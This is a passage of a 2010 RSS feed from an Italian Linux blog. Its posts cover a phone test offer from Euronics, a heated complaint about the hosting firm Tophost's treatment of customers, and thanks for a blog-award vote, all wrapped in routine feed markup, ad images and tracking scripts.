src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Uh, il sole ha fatto burp Photo" /></p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/uh-il-sole-ha-fatto-burp" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/cFB7h4udXC4" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/uh-il-sole-ha-fatto-burp/feed/</wfw:commentRss> <slash:comments>15</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/uh-il-sole-ha-fatto-burp</feedburner:origLink></item> <item><title>Messaggi che ti rallegrano la giornata</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/1f57KJ5unS4/messaggi-che-ti-rallegrano-la-giornata</link> <comments>http://www.ilportalinux.it/messaggi-che-ti-rallegrano-la-giornata#comments</comments> <pubDate>Wed, 04 Aug 2010 16:56:04 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Android]]></category> <category><![CDATA[Sony Ericcson]]></category> <category><![CDATA[Telefonia]]></category> <category><![CDATA[Tempo libero]]></category> <category><![CDATA[euronics]]></category> <category><![CDATA[sony ericcson]]></category> <category><![CDATA[test]]></category> <category><![CDATA[x10 mini pro]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1939</guid> <description><![CDATA[Stamattina arrivo in ufficio e come al solito passo qualche minuto a cazzeggiare prima di immergermi nel &#8220;meraviglioso mondo del lavoro&#8221;. Tra le operazioni di cazzeggio c&#8217;è, ovviamente, la connessione a Friendfeed; apro la home page e mi ritrovo un nuovo messaggio privato, clicco e&#8230;...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/vBdS1pxR7EKre1iI-r3fOZN89Fc/0/da"><img src="http://feedads.g.doubleclick.net/~a/vBdS1pxR7EKre1iI-r3fOZN89Fc/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/vBdS1pxR7EKre1iI-r3fOZN89Fc/1/da"><img src="http://feedads.g.doubleclick.net/~a/vBdS1pxR7EKre1iI-r3fOZN89Fc/1/di" border="0" ismap="true"></img></a></p><p>Stamattina arrivo in ufficio e come al solito passo qualche minuto a cazzeggiare prima di immergermi nel &#8220;<em>meraviglioso mondo del lavoro&#8221;. T</em>ra le operazioni di cazzeggio c&#8217;è, ovviamente, la connessione a Friendfeed; apro la home page e mi ritrovo un nuovo messaggio privato, clicco e&#8230;</p><p
style="text-align: center;"><span
id="more-1939"></span><a
href="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-17.png" rel="lightbox[1939]"><img
class="size-full wp-image-1940 aligncenter" title="Schermata-17" src="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-17.png" alt="Messaggi che ti rallegrano la giornata" width="479" height="93" /></a></p><p
style="text-align: center;"> <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Messaggi che ti rallegrano la giornata Photo" /></p><p
style="text-align: left;">Ebbene si, chi gestisce l&#8217;account di euronics su friendfeed ha [ben] pensato di contattarmi per proporre un test, è la prima volta che il test mi viene proposto, di solito mi ci candido personalmente quando vedo annunci e quindi la cosa inorgoglisce non poco.</p><p
style="text-align: left;">Tra l&#8217;altro il messaggio l&#8217;ho letto in mattinata e come vedete reca la scritta &#8220;11 ore fa&#8221; vale a dire che chi mi ha scritto l&#8217;ha fatto in tarda serata, ma questi qui non si riposano mai? <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Messaggi che ti rallegrano la giornata Photo" /></p><p
style="text-align: left;">La cosa ancora più sconcertante è che in mattinata sono stato contattato (<em>o meglio ho risposto al primo contatto</em>), e dopo pranzo (<em>intorno alle 15</em>) avevo già il telefono in mano, spedizione letteralmente <strong>lampo</strong>.</p><p
style="text-align: left;">L&#8217;occasione capita proprio &#8220;<em>a ciccio</em>&#8221; per citare la mia ragazza, visto che il 13 entro in ferie è un ottima occasione per vedere se un X10 mini pro è un buon compagno di viaggio.</p><p
style="text-align: left;">Per adesso quindi ringrazio euronics e, presumibilmente dopo le vacanze, tirerò fuori una bella review del dispositivo.</p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/messaggi-che-ti-rallegrano-la-giornata" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/1f57KJ5unS4" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/messaggi-che-ti-rallegrano-la-giornata/feed/</wfw:commentRss> <slash:comments>5</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/messaggi-che-ti-rallegrano-la-giornata</feedburner:origLink></item> <item><title>Tophost, che simpatici burloni…</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/YwFlODy75BY/tophost-che-simpatici-burloni</link> <comments>http://www.ilportalinux.it/tophost-che-simpatici-burloni#comments</comments> <pubDate>Tue, 03 Aug 2010 10:00:08 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Linux]]></category> <category><![CDATA[assistenza]]></category> <category><![CDATA[maddechè]]></category> <category><![CDATA[miglior hosting italiano]]></category> <category><![CDATA[qualità]]></category> <category><![CDATA[servizio]]></category> <category><![CDATA[topshot]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1924</guid> <description><![CDATA[Scrivo questo articolo al volo, ho già dedicato abbastanza tempo a questa faccenda ma come sempre, queste sono cose che si devono sapere. Da un mesetto a questa parte l&#8217;azienda (credetemi che ho fatto uno sforzo enorme a definirla tale) tophost ha scatenato un putiferio...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/yFOXvEC80y6aTjpDnP4nI0sNKS4/0/da"><img src="http://feedads.g.doubleclick.net/~a/yFOXvEC80y6aTjpDnP4nI0sNKS4/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/yFOXvEC80y6aTjpDnP4nI0sNKS4/1/da"><img src="http://feedads.g.doubleclick.net/~a/yFOXvEC80y6aTjpDnP4nI0sNKS4/1/di" border="0" ismap="true"></img></a></p><p>Scrivo questo articolo al volo, <a
href="http://www.ilportalinux.it/tophost-10-euro-lanno-tutto-incluso-compresi-insulti" target="_blank">ho già dedicato abbastanza tempo</a> a questa faccenda ma come sempre, queste sono cose che si devono sapere.</p><p><span
id="more-1924"></span>Da un mesetto a questa parte l&#8217;azienda (<em>credetemi che ho fatto uno sforzo enorme a definirla tale</em>) tophost ha scatenato un putiferio sulla rete, a causa dei suoi comportamenti nei confronti dei suoi stessi clienti paganti.</p><p>Ieri come si vede dagli update all&#8217;articolo linkato, ho avuto una discussione su friendfeed con le persone che gestiscono l&#8217;utenza &#8220;tophost&#8221; sul social network. Il mio intento era cercare di far capire che cosi facendo non fanno altro che ottenere un immensa figura di merda di fronte agli stessi clienti che gli danno da mangiare ma niente, dopo un piccolo barlume di speranza l&#8217; &#8220;azienda&#8221; è tornata sui suoi passi.</p><p>Un lettore di questo blog infatti mi scrive facendomi notare <a
href="http://friendfeed.com/tophostlive/69cf6c13/il-portalinux-portale-si-di-fandonie-rif" target="_blank">l&#8217;ennesimo sfottò</a>, questa volta nei miei confronti:</p><p
style="text-align: center;"><a
href="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-14.png" rel="lightbox[1924]"><img
class="size-medium wp-image-1926 aligncenter" title="Schermata-14" src="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-14-300x131.png" alt="Tophost, che simpatici burloni..." width="300" height="131" /></a></p><p
style="text-align: left;">Come al solito, quando ci sono persone ed articoli che lodano tophost retwittano e diffondono molto volentieri, non appena qualcuno inizia ad opporre qualche critica inizia a beccarsi le prese in giro, gli insulti e le diffamazioni.</p><p
style="text-align: left;">L&#8217;articolo che vedete (<em>non lo linko perchè non voglio regalargli nemmeno la dignità di un trackback, cmq avete sia l&#8217;indirizzo del blog che il titolo del post, è facile trovarlo&#8230;se volete proprio farvi cosi tanto del male <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Tophost, che simpatici burloni... Photo" /> </em>) è di un certo &#8220;camu&#8221; alias &#8220;due chiacchiere&#8221; su friendfeed, questo utente è venuto tempo fa su questo blog appositamente per scatenare flame nei commenti, come da sua stessa ammissione, il mio errore &#8211; purtroppo &#8211; è stato quello di dargli retta, alla fine siccome il suo scopo era distogliere l&#8217;attenzione, esaurito il flame ho ripulito i commenti e li ho piazzati nella cartella dei commenti spam, ed ho negato futuri accessi al troll in questione&#8230;</p><p
style="text-align: center;"><a
href="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-15.png" rel="lightbox[1924]"><img
class="size-medium wp-image-1927 aligncenter" title="Schermata-15" src="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-15-300x169.png" alt="Tophost, che simpatici burloni..." width="300" height="169" /></a></p><p
style="text-align: left;">ma purtroppo l&#8217;arma più pericolosa che un troll può avere è un proprio blog, e infatti l&#8217;utente (<em>o utonto? decidetelo voi&#8230;</em>) è corso subito a pubblicizzare la cosa additandomi come un censore eccetera&#8230;</p><p
style="text-align: left;">Come se non bastasse vengo a sapere che giusto stamani effe8, amministratore del forum &#8220;<em>esterno</em>&#8221; (<em>a loro dire</em>) a tophost, prozone, <a
rel="nofollow" href="http://www.prozone.it/smf/index.php?topic=3793.new#new" target="_blank">ha bannato xal</a>, un cliente tophost che inizialmente si era lamentato dei continui down di uno dei nodi dell&#8217;infrastruttura, e che poi si è visto cancellare il topic in cui chiedeva assistenza perchè era sfociato, come al solito, in un flame grazie agli insulti ed alle prese in giro del &#8220;<em>collaboratore</em>&#8221; nonchè ex-moderatore del forum, Volverine.</p><p
style="text-align: center;"><a
href="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-16.png" rel="lightbox[1924]"><img
class="size-medium wp-image-1929 aligncenter" title="Schermata-16" src="http://www.ilportalinux.it/wp-content/uploads/2010/08/Schermata-16-300x77.png" alt="Tophost, che simpatici burloni..." width="300" height="77" /></a></p><p
style="text-align: left;">Seguito poi da un altro cliente tophost, Elearning Works, che a seguito di un suo messaggio nei confronti di un utente che difendeva a spada tratta l&#8217; <em>azienda, </em>è stato ammonito (<em>e quindi presumo gli sia stato negato temporaneamente l&#8217;accesso al forum</em>).</p><p
style="text-align: left;"><p
style="text-align: left;">Insomma, il forum è stato creato per dare assistenza ai clienti, però se questi si lamentano vengono:</p><ol><li>derisi</li><li>bannati/ammoniti</li></ol><p>se invece non fai altro che scrivere lodi al servizio tophost vieni considerato il miglior utente in circolazione.</p><p
style="text-align: left;">È evidente che sono alla canna del gas, non sanno gestire la propria infrastruttura ne i rapporti coi propri clienti, il nodo 8 infatti <a
href="http://www.facebook.com/pages/FotoSintesi/296190417857#topic_top" target="_blank">ha problemi da un sacco di tempo</a> gli utenti che si lamentano della scarsa qualità del servizio sono in tanti, ma a tophost sembra non importare per loro la cosa importante è cercare su google &#8220;<em>miglior hosting italiano</em>&#8221; e vedere che sono in prima pagina, peccato che il risultato in questione fa capo <a
rel="nofollow" href="http://clienti.tophost.it/" target="_blank">ad una loro pagina</a> ottimizzata, evidentemente, con le keyword di cui sopra e dove &#8211; guardacaso &#8211; <strong>scrivono solo utenti (<em>veri? chi lo sa..</em>) soddisfatti</strong>.</p><p
style="text-align: left;">Riguardo la mia esperienza gli unici utenti che non si lamentano, ma che naturalmente non giustificano nemmeno questo comportamento, sono quelli che usano tophost come parcheggio per i domini o come gestore lowcost per i loro dns, chi deve utilizzare tophost come hosting web vero e proprio si lamenta (<em>o almeno tenta di farlo</em>).</p><p
style="text-align: left;">Adesso, alla luce dei fatti, tu visitatore che tramite google [spero] sei finito su queste pagine, sei <strong>davvero sicuro</strong> di voler affidare i tuoi soldi ed i tuoi servizi a un gestore cosi?</p><p
style="text-align: left;">Diffondete più che potete per favore.</p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/tophost-che-simpatici-burloni" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/YwFlODy75BY" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/tophost-che-simpatici-burloni/feed/</wfw:commentRss> <slash:comments>54</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/tophost-che-simpatici-burloni</feedburner:origLink></item> <item><title>Il Portalinux ai macchianera blog awards [grazie @killeader]</title><link>http://feedproxy.google.com/~r/IlPortalinux/~3/xUTbezqI2YM/il-portalinux-ai-macchianera-blog-awards-grazie-killeader</link> <comments>http://www.ilportalinux.it/il-portalinux-ai-macchianera-blog-awards-grazie-killeader#comments</comments> <pubDate>Mon, 02 Aug 2010 07:15:51 +0000</pubDate> <dc:creator>M0rF3uS</dc:creator> <category><![CDATA[Di tutto un pò]]></category> <category><![CDATA[blog awards]]></category> <category><![CDATA[grazie @killeader]]></category> <category><![CDATA[macchianera]]></category> <category><![CDATA[portalinux]]></category><guid isPermaLink="false">http://www.ilportalinux.it/?p=1904</guid> <description><![CDATA[Il titolo a carattere sensazionalista è puramente intenzionale Questo è un post  per ringraziare pubblicamente killeader che ha votato questo blog per i macchianera blog awards, in quale categoria non si sa, probabilmente come &#8220;miglior blog per il cazzeggio&#8221; Sono ben cosciente che quel voto...]]></description> <content:encoded><![CDATA[
<p><a href="http://feedads.g.doubleclick.net/~a/hrarTVgS3ATWlTlwYrSdpdB9L20/0/da"><img src="http://feedads.g.doubleclick.net/~a/hrarTVgS3ATWlTlwYrSdpdB9L20/0/di" border="0" ismap="true"></img></a><br/>
<a href="http://feedads.g.doubleclick.net/~a/hrarTVgS3ATWlTlwYrSdpdB9L20/1/da"><img src="http://feedads.g.doubleclick.net/~a/hrarTVgS3ATWlTlwYrSdpdB9L20/1/di" border="0" ismap="true"></img></a></p><p>Il titolo a carattere sensazionalista è puramente intenzionale <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' title="Il Portalinux ai macchianera blog awards [grazie @killeader] Photo" /></p><p><span
id="more-1904"></span>Questo è un post  per ringraziare pubblicamente<a
href="http://friendfeed.com/killeader" target="_blank"> killeader</a> che <a
href="http://friendfeed.com/killeader/69b6204a/tutti-chiedere-di-votare-il-proprio-blog-e-io" target="_blank">ha votato questo blog</a> per i macchianera blog awards, in quale categoria non si sa, probabilmente come &#8220;<em>miglior blog per il cazzeggio</em>&#8221; <img
src='http://www.ilportalinux.it/wp-includes/images/smilies/icon_biggrin.gif' alt=':D' class='wp-smiley' title="Il Portalinux ai macchianera blog awards [grazie @killeader] Photo" /></p><p>Sono ben cosciente che quel voto resterà unico infatti non ho mai preteso di partecipare visti i colossi che ogni anno concorrono; ma insomma certe notizie fanno sempre piacere e quindi è doveroso ringraziarlo.</p> <script src="http://feeds.feedburner.com/~s/IlPortalinux?i=http://www.ilportalinux.it/il-portalinux-ai-macchianera-blog-awards-grazie-killeader" type="text/javascript" charset="utf-8"></script> <img src="http://feeds.feedburner.com/~r/IlPortalinux/~4/xUTbezqI2YM" height="1" width="1"/>]]></content:encoded> <wfw:commentRss>http://www.ilportalinux.it/il-portalinux-ai-macchianera-blog-awards-grazie-killeader/feed/</wfw:commentRss> <slash:comments>7</slash:comments> <feedburner:origLink>http://www.ilportalinux.it/il-portalinux-ai-macchianera-blog-awards-grazie-killeader</feedburner:origLink></item> </channel> </rss><!-- Performance optimized by W3 Total Cache. Learn more: http://www.w3-edge.com/wordpress-plugins/

Minified using disk
Page Caching using disk (enhanced)
Database Caching 1/35 queries in 0.004 seconds using disk
Object Caching 2388/2484 objects using disk

Served from: www.ilportalinux.it @ 2010-09-06 20:14:56 -->
